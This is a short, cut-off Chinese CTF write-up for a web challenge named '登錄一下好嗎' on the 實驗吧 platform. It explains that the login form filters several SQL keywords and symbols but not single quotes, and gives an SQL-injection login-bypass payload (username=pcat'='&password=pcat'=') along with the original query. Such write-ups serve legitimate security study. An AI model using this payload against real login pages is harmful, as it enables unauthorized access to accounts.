實驗吧CTF-web

登錄一下好嗎 類型:sql注入 已通過濾了/ # -- select or union |等,可是沒有過濾單引號php payload:username=pcat'='&password=pcat'='html 原sql語句爲:python select * from user where username='用戶名' and password='密碼' 拼接後爲:mysql select * f
相關文章
相關標籤/搜索